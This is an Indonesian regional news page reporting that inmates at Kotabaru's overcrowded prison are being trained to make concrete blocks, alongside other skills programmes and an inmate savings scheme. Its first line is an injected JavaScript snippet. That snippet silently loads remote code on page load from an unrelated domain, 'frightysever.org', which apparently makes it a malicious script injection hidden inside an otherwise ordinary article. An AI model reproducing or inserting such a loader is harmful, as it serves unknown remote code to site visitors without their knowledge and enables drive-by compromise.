(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kabupaten Kotabaru

Lapas Kotabaru Terus Tingkatkan SDM Warga Binaan, Kini Diajari Bikin Batako


KANALKALIMANTAN.COM, KOTABARU – Di tengah kondisi over kapasitas Lembaga Permasyarakatan (Lapas) Kelas II A Kotabaru, namun tak menghalangi warga binaan untuk berkarya. Banyaknya program kegiatan pembinaan untuk peningkatan Sumber Daya Manusia (SDM) yang mandiri menjadi salah satu upaya nyata yang dilakukan oleh petugas Lapas kepada para warga binaan.

Kepala Lapas Kelas II A Kotabaru, Yosef Benyamin Yembise, kepada Kanalkalimantan.com Jumat (15/7/2022) mengatakan, pembinaan di dalam Lapas Kotabaru terus mengalami peningkatan dari waktu ke waktu. Baik itu pembinaan kepribadian dan kemandirian terus digalakkan demi menciptakan SDM warga binaan yang berkualitas.

“Meski kita sadari bersama, kondisi Lapas Kotabaru over kapasitas kurang lebih mencapai 300 persen dengan SDM pegawai yang sangat terbatas baik kuantitas maupun kualitas, namun kami selalu berusaha memberikan pembinaan yang terbaik bagi warga binaan dengan menggandeng stack holder lainnya,” tutur Kalapas asli dari Papua ini.

Dilanjutkannya, ada beberapa bentuk kegiatan pembinaan kemandirian yang dilaksanakan seperti halnya membuat kain Sasirangan khas Saijaan, telur asin, meubeler, tas dan dompet berbahan sasirangan.

 

Baca juga  : Pemkab HSU Gelar Gotong Royong Bersihkan Kawasan Pasar Amuntai 

Demikian juga pembuatan demplot pembibitan tanaman kelapa sawit dan sekarang ada lagi pembuatan bahan bangunan yaitu batako dengan kualitas yang siap bersaing ditengah pangsa pasar.

“Salah satu produk  yang sedang kami olah adalah Batako, warga binaan mendapatkan pelatihan dari instruktur yang handal dan dari Lapas kini mereka dapat memproduksi Batako dengan kualitas baik. Untuk memastikan kualitas hasilnya, Lapas memberi kesempatan kepada masyarakat untuk melihat langsung dan membuktikan kualitas Batako tersebut sebelum dibeli,” tambahnya.

Dikatakannya lebih jauh, pihaknya memilih program pembinaan kemandirian cetak Batako karena membaca peluang pasar dimana Kabupaten Kotabaru adalah penyangga Ibukota Negara (IKN) yang harus mempersiapkan infrastrukutur.

Kemudian, hasil dari penjualannya nanti akan diarahkan untuk di tabung oleh warga binaan melalui Program Gernabung (Gerakan Narapidana Menabung) dimana Lapas Kotabaru telah menjalin kejasama dengan Bank BRI Cabang Kotabaru untuk membuka rekening dan tabungan warga binaan.

 

Baca juga  : Anggarkan Rp 2 Miliar, Pemkab  HSU Bakal Revitalisasi Pasar Induk Amuntai

“Hasil dari penjualan produk narapidana inipun sebagian akan disetor kepada negara lewat PNBP (Penerimaan Negara Bukan Pajak) sebagai wujud kontribusi warga binaaan untuk negara. Intinya adalah, Lapas Kotabaru bukanlah yang terbaik namun selalu berusaha menjadi yang terbaik dalam melayani masyarakat demi bangsa dan negara tercinta,” imbuhnya.

Salah seorang warga binaan, Ponco menuturkan, ia mengaku sangat senang dan bangga pastinya dengan berbagai program pembinaan yang dilaksanakan di Lapas Kotabaru. Walau berstatus narapidana dirinya dapat belajar untuk mengembangkan potensi yang dimilikinya.

“Kami didalam Lapas bukan hanya diberikan edukasi untuk kemandirian namun juga diajari menabung untuk bekal kami dan itu sangat baik sekali. Terimakasih kepada Lapas Kotabaru utamanya kepada Kepala Lapas dan jajarannya yang telah mendidik kami dengan sangat baik,” ujarnya.(Kanalkalimantan.com/Muhammad)

Reporter : Muhammad
Editor : cell


Desy Arfianty

Recent Posts

LITERASI EMOSIONAL DI MEDIA SOSIAL: MENGELOLA EMOSI DAN INTERKASI ONLINE

"WEBINAR INDONESIA MAKIN CAKAP DIGITAL" WILAYAH KALIMANTAN Read More

11 menit ago

Wabup Banjar Hadiri Haul Ke-68 KH Zainal Ilmi

KANALKALIMANTAN.COM, MARTAPURA - Wakil Bupati Banjar Habib Idrus Al Habsyi betbaur dengan ribuan orang menghadiri… Read More

51 menit ago

Simulasi Keadaan Darurat di Terminal BBM Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - PT Pertamina Patra Niaga Integrated Terminal Banjarmasin melakukan simulasi keadaan darurat bersama… Read More

11 jam ago

Lawatan Politik Lisa Halaby Berlanjut ke PKS dan Demokrat

KANALKALIMANTAN.COM, BANJARBARU – Lawatan politik Erna Lisa Halaby terus berlanjut mendatangi dua partai politik jelang… Read More

12 jam ago

Kloter 1 Banjarmasin Sudah di Mekah, Kloter 8 Diterbangkan Hari Ini

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter 1 Embarkasi Banjarmasin dari Kabupaten Banjar, Kalimantan Selatan (Kalsel)… Read More

13 jam ago

Pj Bupati Kapuas Ngopi Santai Bersama Warga Pulau Telo

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi, ngopi santai bareng mendengar aspirasi… Read More

14 jam ago

This website uses cookies.